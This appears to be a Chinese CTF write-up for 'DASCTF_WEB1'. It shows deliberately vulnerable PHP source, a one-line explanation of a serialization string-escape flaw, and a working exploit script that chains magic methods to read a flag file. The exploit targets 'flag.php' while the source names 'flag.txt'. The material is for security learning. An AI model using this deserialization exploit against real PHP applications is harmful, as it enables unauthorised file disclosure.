DASCTF_WEB1
放毒:喝雪碧的鸡
干杯:
源码
<?php
show_source("index.php");
function write($data) {
return str_replace(chr(0) . '*' . chr(0), ' ', $data);
}
function read($data) {
return str_replace(' ', chr(0) . '*' . chr(0), $data);
}
class A{
public $username;
public $password;
function __construct($a, $b){
$this->username = $a;
$this->password = $b;
}
}
class B{
public $b = 'gqy';
function __destruct(){
$c = 'a'.$this->b;
echo $c;
}
}
class C{
public $c;
function __toString(){
//flag.txt
echo file_get_contents($this->c);
return 'nice';
}
}
$a = new A($_GET['a'],$_GET['b']);
//省略了存储序列化数据的过程,下面是取出来并反序列化的操作
$b = unserialize(read(write(serialize($a))));
参考:https://www.cnblogs.com/magic-zero/p/11643916.html
分析
function write($data) {
return str_replace(chr(0) . '*' . chr(0), ' ', $data);
}
function read($data) {
return str_replace(' ', chr(0) . '*' . chr(0), $data);
}
这两个函数会因为序列化的严格规则,造成字符串逃逸。
exp
<?php
class A{
public $username;
public $password;
}
class B{
public $b = 'gqy';
}
class C{
public $c = "flag.php";
}
$c = new C();
$b = new B();
$b->b = $c;
$exp = 'AAAA";s:5:"h3zh1";'.serialize($b);
$aa = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
echo "a=".$aa."&b=".$exp;